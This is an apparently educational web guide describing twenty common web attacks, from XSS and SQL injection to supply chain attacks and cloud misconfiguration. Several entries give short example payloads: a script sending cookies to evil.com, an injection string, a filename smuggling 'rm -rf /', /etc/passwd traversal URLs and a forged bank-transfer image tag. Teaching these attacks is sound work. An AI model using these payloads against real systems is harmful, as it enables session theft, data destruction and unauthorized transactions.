Guide: The Main Web Attacks

1. XSS (Cross-Site Scripting)

Description: XSS is a vulnerability where an attacker injects malicious JavaScript code into a web page. This code runs in the browsers of other users who visit the page.

Why and for what: Allows stealing session cookies, redirecting users to phishing sites, displaying fake login forms, or logging keystrokes.

Attack example: A site allows users to leave comments without filtering tags. The attacker posts:

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

When other users view the comment, their browser sends session cookies to the attacker’s server.

2. SQL Injection (SQLi)

Description: SQL Injection is when an attacker inserts malicious SQL commands into input fields that are directly used in database queries without proper sanitization.

Why and for what: Allows bypassing authentication, stealing, modifying, or deleting data from the database.

Attack example: Login query:

SELECT * FROM users WHERE username = '$input_username' AND password = '$input_password'

Attacker inputs:

' OR '1'='1

Resulting query:

SELECT * FROM users WHERE username = '' OR '1'='1'

Always true, so attacker logs in without a password.

3. Remote Code Execution (RCE)

Description: RCE is a vulnerability that allows an attacker to execute arbitrary commands on the server.

Why and for what: Full server takeover, deleting or stealing files, installing malware.

Attack example: A site runs a command after file upload:

convert $filename output.pdf

If the attacker uploads a file named:

file.png; rm -rf /

The server executes rm -rf / deleting all files.

4. LFI / RFI (Local / Remote File Inclusion)

Description: The attacker tricks the server into loading local or remote files that should not be accessible.

Why and for what: To read sensitive system files or execute malicious remote code.

Attack example: URL:

https://site.com/page.php?file=../../../../etc/passwd

Returns system password file content instead of the page.

5. CSRF (Cross-Site Request Forgery)

Description: Forces a logged-in user’s browser to perform unwanted actions on a trusted site without their knowledge.

Why and for what: Unauthorized money transfers, password changes, data deletion.

Attack example: User is logged into their bank. Attacker sends an email with:

<img src="https://bank.com/transfer?to=attacker&amount=1000">

Opening the email triggers a money transfer request automatically.

6. Broken Access Control

Description: Failure to properly check user permissions, allowing access to unauthorized data or actions.

Why and for what: Accessing other users’ accounts, admin panels, or modifying data.

Attack example: User views profile:

https://site.com/profile?id=123

Changes id to 124 and sees someone else’s profile because access isn’t verified.

7. Directory Traversal

Description: Tricks the site into reading files outside the web root directory by using special characters.

Why and for what: Steal passwords, config files, or map server file structure.

Attack example: Request:

https://site.com/view?file=../../../etc/passwd

Returns system password file content.

8. SSRF (Server-Side Request Forgery)

Description: Forces the server to make HTTP requests to internal or external resources on behalf of the attacker.

Why and for what: Access internal services, bypass firewalls, conduct further attacks.

Attack example: Parameter:

https://site.com/fetch?url=http://localhost/admin

Server fetches internal admin page not accessible externally.

9. Clickjacking

Description: Tricks a user into clicking hidden or disguised elements.

Why and for what: Make the user perform unintended actions like deleting accounts.

Attack example: A “Play” button is overlaid with a transparent frame containing a “Delete Account” button.

10. Insecure Deserialization

Description: Flaws in deserializing data allow execution of arbitrary code.

Why and for what: Remote code execution, privilege escalation.

Attack example: Sending a crafted serialized object that executes code when deserialized.

11. Rate Limit Bypass

Description: Lack of or bypassing restrictions on the number of requests a user or IP can make.

Why and for what: Brute force attacks, spam, denial of service.

Attack example: Automated scripts send thousands of login attempts per second.

12. Open Redirect

Description: Redirects users from a trusted website to a malicious one.

Why and for what: Phishing and abuse of trust.

Attack example: URL:

https://trusted.com/redirect?url=http://evil.com

User thinks they are on trusted.com but lands on a malicious site.

13. Subdomain Takeover

Description: Taking control of an unused or expired subdomain.

Why and for what: Hosting phishing or malware sites under trusted domain names.

Attack example: An expired subdomain old.example.com is registered by attacker and used maliciously.

14. HTTP Request Smuggling

Description: Manipulating HTTP requests to confuse proxies and servers, causing one request to be interpreted as two.

Why and for what: Bypass authentication, steal data from other users.

Attack example: Sending conflicting Content-Length headers to split requests.

15. Cache Poisoning

Description: Injecting malicious content into cached responses of proxies or browsers.

Why and for what: Serve fake pages to multiple users.

Attack example: Modifying server response to include malicious JavaScript cached by proxies.

16. Padding Oracle / Crypto Attacks

Description: Exploiting cryptographic weaknesses to decrypt or tamper with encrypted data.

Why and for what: Bypass encryption, steal data.

Attack example: Repeated queries to an oracle to decrypt ciphertext byte by byte.

17. Mass Assignment

Description: Changing hidden or unauthorized fields in API requests.

Why and for what: Escalate privileges (e.g., set isAdmin to true).

Attack example: Sending JSON payload:

{
  "username": "user",
  "isAdmin": true
}

Server accepts and grants admin rights.

18. JWT Tampering

Description: Modifying JSON Web Tokens to gain unauthorized access.

Why and for what: Impersonate users or escalate privileges.

Attack example: Changing user ID in token payload without valid signature.

19. Supply Chain Attack

Description: Injecting malicious code into third-party libraries or tools used by many projects.

Why and for what: Mass compromise, backdoors.

Attack example: A compromised npm package contains malware that infects all projects using it.

20. Public Cloud Misconfiguration

Description: Misconfigured cloud resources exposing sensitive data publicly.

Why and for what: Data leaks, compliance violations.

Attack example: An AWS S3 bucket is left public with confidential documents accessible to anyone.

Last updated 6 days ago

Was this helpful?